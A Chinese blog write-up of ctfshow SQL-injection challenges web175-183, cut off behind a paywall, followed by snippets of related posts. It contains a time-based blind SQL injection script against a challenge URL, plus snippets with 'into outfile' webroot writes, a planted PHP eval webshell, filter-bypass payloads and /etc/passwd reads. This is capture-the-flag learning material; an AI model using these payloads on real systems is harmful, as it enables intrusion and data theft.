ctfshow web175-183

原创 已于 2022-03-14 18:52:40 修改 · 6.4k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql

于 2022-03-14 18:46:47 首次发布
本文讲述了作者逐步破解Web应用中的SQL过滤,通过时间盲注、字符替代和万能密码策略,成功绕过限制获取flag的过程,涉及技术包括字符编码、SQL注入手法和绕过技术。

目录

Web 175

Web 176

Web 177

Web 178

Web 179

Web 180

Web 181

Web 182

Web 183

Web 175

if(!preg_match('/[\x00-\x7f]/i', json_encode($ret)))

刚开始不知道这句话是什莫意思,还在尝试之前的方法,发现没用。

\xnn 匹配ASCII代码中十六进制代码为nn的字符
[\x00-\x7f] 匹配ASCII值从0-127的字符

所以ASCII值得0-127都被过滤了,select没法用了。

只能盲注了,试一下
1' and sleep(6)--+
发现确实有延迟,所以可以考虑时间盲注。
时间盲注:
通过时间函数使SQL语句执行时间延长,从页面响应时间判断条件是否正确的一种注入方式。简单说就是,当页面出现延时响应,且响应时间与设定的时间函数一致,则表示前半部分的猜测正确,若出现查询直接返回结果,页面响应未出现延迟,则说明未执行到时间函数的部分,and的判断中,前半部分就已经出错了。
利用脚本来获取flag。
import requests

from time import time


url='http://774b555f-930c-4ab9-acbe-7ef82922d659.chall.ctf.show/api/v5.php'


flag=''

for i in range(1,100):

    length=len(flag)

    min=32

    max=128

    while 1:

        j=min+(max-min)//2

        if min==j:

            flag+=chr(j)

            print(flag)

            break


        payload="?id=' union select 'a',if(ascii(substr((select group_concat(password) from ctfshow_user5 where username='flag'),%d,1))<%d,sleep(0.5),1) -- -"%(i,j)


        start_time=time()

        r=requests.get(url=url+payload).text

        end_time=time()

        #print(r)



        if end_time-
最低0.47元/天 解锁文章
ctfshow sql入门174 175脚本
2202_75317918的博客
11-14 349
因为觉得脚本写的太烂了,二分法也迷迷糊糊的主要是python怎么学的那么烂!!再研究一下。
ctfshow-sql注入-超详解(172-200)
qq_50589021的博客
08-05 3295
前言 今天是2021/7/25,正式进入sql注入专题,目标:加强python的学习,达到通过写python脚本,加快注入速度的程度,掌握sql在php编程中的一系列查询语句。 新手区 可以看看Y4师傅以前记录的小笔记 SQL注入之MySQL注入的学习笔记(一) SQL注入之MySQL注入学习笔记(二) 2021-7-25 web172、web173——hex() 、to_base64() 查询语句 //拼接sql语句查找指定ID用户 $sql = "select username,password fro
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow SQL注入Web175
m0_62584974的博客
05-01 1029
查询语句 //拼接sql语句查找指定ID用户 $sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;"; 返回逻辑 //检查结果是否有flag if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){ $ret['msg']='查询成功'; } Play...
ctfshow_web175
qq_38634097的博客
05-28 595
0-127表示单字节字符:数字,英文字符,半角符号,以及某些控制字符。那我们换个思路,不让在页面显示,写在某个文件里,然后查看文件内容。\xnn 匹配ASCII代码中十六进制代码为nn的字符。[x00-x7f] 匹配ASCII值从0-127的字符。打开场景可以看到在本题中,页面的拦截方式做了改变。也就说,是以上字符的不会在页面显示出来。
ctfshow-web入门-sql注入(web171-web175
Welcome To My6n Blog
07-31 2932
这里只出了一个 id,因为换行导致我们误判为到了最后一个字符,因为我们的字典里只包括数字、小写字母和下划线,因此字符没找到,便跳出外层循环结束了代码。判断一下这次又是三个字段数了,因为还是对输出过滤了 flag,所有我们还是不查用户名,用占位符占位即可。接下来我们先判断下它数据库名的长度,这个其实可以通过 burpsuite 的攻击模块爆破的,没关系,我们这里手写一遍,也锻炼下我们 python 的能力。
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow web入门 sqli-labs web517--web524
2301_81040377的博客
06-28 644
然后发现这几个表里面没有flag,我们重新倒回去爆库名,肯定是库错了,因为我偷工减料了。盲猜是一个md5闭合我没有跑fuzz,正常做法应该是跑个fuzz。不会的去我主页学,hhh。单引号被过滤了好像是。所以我是自己慢慢试的。闭合换了并且不是盲注。
2024年网络安全最全ctfshow-WEB-web5_ctfshow web5
2401_84281698的博客
05-03 808
ctf.show WEB模块第5关需要传递两个参数,一个字符串,一个数字,并且两个参数的md5值必须相同,我们可以利用md5的0e漏洞进行绕过0e绕过是指:0e开头的字符串在参与弱类型比较时,会被当做科学计数法,结果转换为0;我们只要传入两个md5值是以0e开头的参数,即可绕过md5加密,夺取flag页面中展示了部分源码,从源码中我们可以得知,想要夺旗需要通过GET请求传递两个参数v1和v2,并且参数v1必须是纯字母字符串,参数v2必须是数字或者数字字符串,并且两个参数的md5值必须相等。
ctfshow web123-127
akxnxbshai的博客
02-08 3680
目录 Web 123 Web 125 Web 126 Web 127 Web 123 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ct
ctfshow-web175详细解答
weixin_68408599的博客
04-22 494
打开hackbar在里面post传值中输入1=phpinfo();抓包显示输入错误,在头部ctf.show/后输入1.php(植入的文件)1=system("ls");可以看见api目录,进入1=system("ls ./api/");传递,$_POST[1]参数包含一串可执行代码,然后使用此参数调用。信息都已经出来,在蚁剑中进行数据操作得到以下数据。通过此条语句进行植入代码,代码将作为。
CTFshow 175 into outfile ‘/var/www/html/1.txt‘
sinat_31884905的博客
05-23 377
[x00-x7f] 匹配ASCII值从0-127的字符 0-127表示单字节字符,也就是:数字,英文字符,半角符号,以及某些控制字符。 限制了页面不能显示任何数据, ?id=1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+&page=1&limit=10 就跳到这里了,真的很神奇,所以说 select xxx from xxx into outfile '/var/
CTFSHOW web入门 sql注入 无过滤注入 web171-175
sinat_41572027的博客
07-07 2035
ctfshow web171-174
CTFshow web(sql注入171-175
csjjjd的博客
02-20 954
替换:将数据to_base64加密,然后将里面所有的数字用replace()替换。注意这里已经提示你了,只要知道是ctfshow_user,就可以拿到flag。然后接着一个个查询看看哪个表里面有flag,经测试,第二个表有flag。ps:注意把ctfshow后面的都删去,改成1.txt。那个过滤函数别被骗了,照样该怎么做怎么做。还是那个语句查询表名。还是那个语句查询表名。base64解码就好。
适合小白ctfshow-web入门—sql注入175-248超详细解析!!
2201_75930505的博客
09-12 980
将数据输出到一个文件中,然后访问对应文件: 这是一个UNION查询,它将原始查询的结果与从表中选择的用户名和密码进行合并。: 这部分似乎是将查询结果导出到文件。路径表示要将查询结果写入到位于网页根目录下的名为1.txt的文件中。(路径是一个常见的用于存放网页文件的目录,通常被称为网页根目录。在许多Web服务器中,这个目录被设置为存放网站的主要文件,因此可以通过浏览器访问。
ctfshow web入门sql注入175
2401_84499748的博客
03-15 463
在这里我做的时候有点懵,那这个该怎么做呢,也有写脚本的,蛋对于我这种更改学了几个月的新手来说有点太难理解了,然后我看来下其他大佬的wp,我发现我们可以不在这个页面上访问到我们的flag,可以通过我们的查询,吧我们查询到的内容写到一个知道的目录下,然后我就找到了这个。然后我们知道了这个路径的话就可以在这里进行相关的文章操作了,在这里我找到了两种方法,首先就是我们的吧flag写到另外一个文件里面去,然后访问这个文件。这个就是我这道题的具体的写法,有一些细节的问题还是请各位佬海量。随后还是访问这个文件。
ctfshow web183-200
songmoshangchen的博客
05-18 326
因为 % 会自动匹配>=一个字符 所以最后一个主机加上就好了。因为 % 会自动匹配>=一个字符 所以最后一个主机加上就好了。跑到最后的时候自己加上“}”跑到最后的时候自己加上“}”
[ctfshow]web183 已知表名的布尔盲注
www.lazy.kim
06-10 428
【代码】[ctfshow]web183 已知表名的布尔盲注。
ctfshow-web入门-sql注入(web181-web185)
Welcome To My6n Blog
08-04 2090
过滤字符:(1)空白字符:空格 ( )、水平制表符 (\x09)、换行符 (\x0a)、垂直制表符 (\x0b)、换页符 (\x0c)、空字符 (\x00)、回车符 (\x0d)、不换行空格 (\xa0)(2)符号:星号 (*)、井号 (#)(3)关键词(不区分大小写):file、into、select1'--%0c1'||1--%0c拿到 flag:ctfshow{bef90a74-9ae2-4c76-8111-0ea0406f120b}
ctfshow web1-20
最新发布
04-01
### CTFShow Web 1 至 20 关解题思路 以下是关于 CTFShow 平台上 Web 类第 1 到 20 关的部分解题思路和相关信息: #### Web 1 通过分析 URL 参数 `id` 的传递方式,可以发现其存在 SQL 注入漏洞。尝试输入特殊字符如 `'` 后观察返回结果的变化。利用布尔盲注或者报错注入的方式获取数据库中的 flag 值[^2]。 ```sql ?id=1' AND '1'='1 --+ ``` #### Web 2 此关卡涉及简单的文件读取操作。目标是从服务器上读取指定路径下的敏感文件内容。通常情况下,默认访问 `/etc/passwd` 文件验证是否存在任意文件读取漏洞。如果成功,则进一步尝试其他可能存储 flags 的常见目录或文件名[^1]。 ```bash ?file=/etc/passwd ``` #### Web 3 考察 LFI(Local File Inclusion) 技巧的应用场景之一。当应用程序允许用户上传并加载外部资源时,可能会暴露出本地系统的内部结构信息。例如,可以通过构造特定 payload 来查看 nginx 日志记录以捕获管理员登录痕迹或其他有用线索。 ```bash ?url=/var/log/nginx/access.log ``` #### Web 4 本题围绕命令执行展开讨论。给定表单字段未经过严格过滤处理前即被直接拼接到 shell 执行语句当中去运行系统指令。因此只需简单地附加反向 Shell Payload 即可实现远程控制受害主机的目的;当然也可以仅为了提取 Flag 而精心设计一条短小精悍却功能强大的管道链来完成任务需求。 ```bash cmd=id%3Bls%20-l%20/etc/ ``` #### Web 5 - Web 20 (概述) 由于具体每道题目细节差异较大,在这里无法逐一列举所有可能性解答方案。但是可以根据以往经验总结如下几类高频考点供参考学习: - **SQL Injection**: 不同形式的数据查询接口都可能存在安全隐患。 - **XSS(Cross-Site Scripting)**: 用户交互型页面容易遭受跨站脚本攻击影响用户体验甚至窃取隐私数据。 - **File Upload Vulnerabilities**: 对于支持图片、文档等形式附件提交的功能模块需格外注意防止恶意程序植入风险。 - **Authentication Bypasses & Authorization Issues**: 登录认证机制薄弱可能导致非法越权行为发生。 以上仅为部分提示方向,请自行探索更多有趣挑战! ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值